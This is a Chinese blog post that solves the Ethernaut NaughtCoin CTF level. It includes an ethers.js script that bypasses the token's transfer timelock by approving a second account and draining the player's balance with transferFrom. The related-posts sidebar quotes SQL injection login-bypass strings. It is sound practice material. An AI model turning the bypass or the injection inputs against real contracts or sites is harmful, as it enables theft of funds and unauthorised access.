Openzeppelin区块链CTF练习——答案和解析【16】NaughtCoin

已于 2024-09-24 11:18:09 修改
阅读量290 收藏 1
点赞数 7
文章标签: 区块链
于 2024-09-24 10:03:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43458715/article/details/142464564
版权

Openzeppelin区块链CTF练习——答案和解析【16】NaughtCoin

openzeppelin出的CTF练习题https://ethernaut.openzeppelin.com/level/0x80934BE6B8B872B364b470Ca30EaAd8AEAC4f63F
在这里插入图片描述

分析

首先需要熟悉ERC20合约内容,通过题目的合约可以看到封锁的是 transfer() 函数,而 transferFrom() 函数 并没有被timeLock锁住。
因此可以授权另一个账号来转移player的token资产。
在这里插入图片描述
在这里插入图片描述

答案——js运行文件

其中abi可以通过浏览器开发者工具通过console输入contract,找到abi右键点击copy object获取
在这里插入图片描述

const { ethers } = require("hardhat");
const abi = require("../contracts/CTF_bug/NaughtCoin_ABI.json");
// 主部署函数。
async function main() {
  //从 ethers 提供的 signers 中获取签名者。
  const [deployer, account02] = await ethers.getSigners();
  const player = deployer.address;
  const account2 = account02.address;
  console.log(`使用账户部署合约: ${player.address}`);

  const provider = new ethers.JsonRpcProvider(process.env.SEPOLIA_RPC_URL);
  const wallet = new ethers.Wallet(process.env.PRIVATE_KEY, provider);
  // 合约地址
  const contractAddress = "0x3Bbe45c142cc11e47d68CD291A89407c5BC08F73"; //换成自己的Instance address

  // 创建合约实例
  const bug = new ethers.Contract(contractAddress, abi, wallet);
  const bugAddress = await bug.getAddress();
  console.log(`Bug合约 部署在 ${bugAddress}`);

  // 获取player账户余额
  let balance = await bug.balanceOf(player);
  console.log("player balance:", balance);
  //获取账户2的被授权金额
  let allowance = await bug.allowance(player, account2);
  console.log("授权前账户2的 allowance:", ethers.formatEther(allowance), "ETH");
  //对账户2进行授权
  const tx = await bug.approve(account2, balance);
  await tx.wait();
  allowance = await bug.allowance(player, account2);
  console.log("授权后账户2的allowance2:", ethers.formatEther(allowance));

  //利用账户2将player中的钱转出去
  const tx2 = await bug
    .connect(account02)
    .transferFrom(player, account2, balance);
  await tx2.wait();
  //查看转账后player的余额
  balance = await bug.balanceOf(player);
  console.log("转账后player balance:", balance, "ETH");
}

// 执行主函数并处理可能的结果。
main()
  .then(() => process.exit(0))
  .catch((error) => {
    console.error(error);
    process.exit(1);
  });
控制台输出:

在这里插入图片描述

koko爱英语
关注
Openzeppelin区块链CTF练习——答案解析【13】Privacy
weixin_43458715的博客
09-20 289
Openzeppelin区块链CTF练习——答案解析【13】Privacy
Openzeppelin区块链CTF练习——答案解析【15】GataKeeperTwo
weixin_43458715的博客
09-22 378
Openzeppelin区块链CTF练习——答案解析【15】GataKeeperTwo
Openzeppelin区块链CTF练习——答案解析【18】Recovery
weixin_43458715的博客
09-27 256
Openzeppelin区块链CTF练习——答案解析【18】Recovery
Openzeppelin区块链CTF练习——答案和超详细解析【14】GataKeeperOne
weixin_43458715的博客
09-20 483
Openzeppelin区块链CTF练习——答案和超详细解析【14】GataKeeperOne
CTF练习——WEB安全(BurpSuite为主)
zytjulie的博客
08-22 3149
CTF训练,WEB安全,Burpsuite部分
CTF练习——MISC隐写及其他部分
zytjulie的博客
08-22 1619
CTF训练——MISC隐写部分
攻防世界CTF入门练习——如来十三掌
Jum的博客
06-10 1667
脑子要灵光,思想要活跃。
CTF练习——[极客大挑战 2019]LoveSQL1
qq_35987366的博客
10-18 3215
一道基础的sql注入练习题,写一下做题思路。 看到一个登录框,随便输入发现是get传参,尝试是否存在sql注入,username=admin' password=123456。 页面报错,存在sql注入,尝试使用万能密码。username=admin password=1' or 1=1 -- qwe。成功登录。 参数username出存在注入点,构造sql语句寻找回显点。步骤如下: (1)猜解字段数 当username=1' order by 4 -- qwe password=...
CTF区块链入门资料
热门推荐
soldi_er的博客
10-11 1万+
文章目录编写课件的心路历程 编写课件的心路历程 查找半个小时,发现CTF区块链的资料很少,稍微有点慌。 在找到 登链社区 查看几篇相关的文章后,发现跟 Re 比较相关,智能合约部分有时会用到反汇编和代码审计。更重要的是,看到的几道CTF题目,多半与智能合约相关,心理阴影面积一时较大。 不过只是入门课程,讲太深了大家也听不懂。简单讲解一下区块链CTF、两道题目,差不多就可以了,主要为学员提供整体的初步了解、以及后续的学习方向。 编写主要思路:先根据 《MasterBitcoin》 整理一下区块链的概念,搭配
ctf题库 CTF理论考核题及答案
07-05
16. **解码内容**:解码"MN2GM63CMFZWKMZSPU====== "得到"ctf{base32}",表明这是BASE32编码。 17. **CTF密码学**:A和B选项描述了古典和现代密码学,其中古典密码学可能被词频分析破解。C选项错误,因为现代密码学...
CTF——攻防世界第一篇
01-08
昨天下午看了关于ctf的视频,发现自己什么也不懂,明明每个字都是我认识的中文,但是组合到一起就不明白了。「我好难……」 而且,看视频我似乎没什么的耐性,一下午下来还是发现自己没学到什么。所以,今天,我决定...
CTF-入门练习
10-30
CTF是一种网络安全竞赛,源自现实世界中的军事演习,现在广泛应用于网络安全教育和技能评估。参赛者需要通过解密、逆向工程、漏洞利用等各种技术手段,攻破安全防护,获取特定的目标信息,即“旗帜”(Flag)。这个...
CTF初学——攻防世界crypto新手练习
m0_59207381的博客
08-04 2032
1. base64 题目描述:元宵节灯谜是一种古老的传统民间观灯猜谜的习俗。 因为谜语能启迪智慧又饶有兴趣,灯谜增添节日气氛,是一项很有趣的活动。 你也很喜欢这个游戏,这不,今年元宵节,心里有个黑客梦的你,约上你青梅竹马的好伙伴小鱼, 来到了cyberpeace的攻防世界猜谜大会,也想着一展身手。 你们一起来到了小孩子叽叽喳喳吵吵闹闹的地方,你俩抬头一看,上面的大红灯笼上写着一些奇奇怪怪的 字符串,小鱼正纳闷呢,你神秘一笑,我知道这是什么了。 解析: 根据题目可知这是一道base64解密加密的问题,直
BugkuCTF练习题解——Web一
qq_41739275的博客
08-24 6611
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
探索未来IT技术的浩瀚星河:一场跨越时代的数字盛宴
2401_85044049的博客
09-25 392
在这场跨越时代的数字盛宴中,云计算、人工智能、大数据和区块链等IT技术如同璀璨星辰,共同编织着未来的宏伟蓝图。它们不仅改变了我们的生活方式和工作模式,更深刻地影响着社会的发展和进步。让我们携手并进,共同探索这片浩瀚的IT技术星空,为创造更加美好的未来贡献智慧和力量。
EE trade:黄金T+D是什么意思
ee_trade的博客
09-25 438
黄金T+D,全称“黄金延期交割”,是由上海黄金交易所推出的标准化合约,允许投资者以保证金的形式进行黄金交易,并可以选择当日交割或延期交割。黄金T+D为国内投资者提供了参与黄金投资的新选择,但投资者需要谨慎对待其风险,并做好风险控制。保证金风险:保证金交易放大投资杠杆,也放大投资风险,如果市场走势不利,可能会造成较大损失。了解风险:在进行黄金T+D交易之前,要充分了解其风险,并根据自身风险承受能力进行投资。学习专业知识:学习黄金T+D交易的专业知识,掌握交易技巧,提高投资胜率。
TON生态系统开发指南:从零开始构建你的Web3应用
Lovely_xwys的博客
09-25 1286
依托其与Telegram的深度整合,TON生态为开发者提供了一个极具潜力的开发环境,特别是在社交、支付和金融这三个核心领域。对于开发者而言,关键是找到合适的细分市场,结合社交和支付功能,打造创新的应用程序。TON生态的未来充满潜力,无论是在技术创新还是市场扩展方面,TON都将是下一个Web3应用的主战场。在TON生态中,遵循80/20法则,20%的顶尖项目将吸引80%的流量和资本。例如,游戏、购物平台或社交网络中的支付流程可以大大简化,用户可以通过Telegram直接支付加密货币,甚至参与链上交易。
Web3的愿景:如何构建去中心化的互联网
最新发布
weixin_44672358的博客
09-30 284
智能合约是Web3的重要组成部分,这些自执行的协议通过自动化合约条款的执行,极大提高了交易的效率和安全性。在区块链上,用户的行为和数据记录是公开的,可以被任何人验证,从而提高了数据的可靠性和持久性。这种透明度不仅提升了信任,也促进了用户之间的互动。此外,ClonBrowser 的账户管理让用户能够轻松切换不同身份,参与多个社群的讨论,从而扩大了社交圈,促进了各个社群间的互动与合作。用户对去中心化的理解直接影响其参与度,因此通过清晰的指导和丰富的学习资源,帮助用户理解去中心化的价值和实际操作方法是必要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值